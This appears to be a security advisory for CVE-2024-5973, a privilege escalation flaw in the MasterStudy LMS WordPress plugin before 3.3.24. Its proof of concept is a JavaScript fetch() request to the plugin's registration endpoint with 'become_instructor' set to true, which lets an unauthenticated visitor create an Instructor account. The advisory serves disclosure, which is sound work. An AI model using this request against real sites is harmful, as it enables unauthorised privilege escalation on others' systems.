MasterStudy LMS < 3.3.24 – Privilege Escalation to Instructor | CVE 2024-5973

Description

The plugin does not prevent students from creating instructor accounts, which could be used to get access to functionalities they shouldn't have.

Proof of Concept

1 - Create a course and lessons.

2 - View the course's page while not connected as a user

3 - Paste the following in your browser's console:

```
await fetch(`/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=${stm_lms_nonces['stm_lms_register']}`, {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0",
        "Accept": "*/*",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/json",
        "Sec-GPC": "1",
        "Priority": "u=1"
    },
    "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/blog/courses-page/hacking-101/",
    "body": "{\"register_user_login\":\"maliciousinstructor\",\"register_user_email\":\"maliciousinstructor@domain.tld\",\"register_user_password\":\"P@ssw0rd!\",\"register_user_password_re\":\"P@ssw0rd!\",\"profile_default_fields_for_register\":[],\"become_instructor\":true,\"additional\":[],\"privacy_policy\":true,\"redirect_page\":\"http://victimsite.tld/blog/courses-page/hacking-101/\",\"additional_instructors\":[],\"degree\":\"\",\"expertize\":\"\"}",
    "method": "POST",
    "mode": "cors"
});
```

4 - Notice a new user called "maliciousinstructor" was created with the "Instructor" role.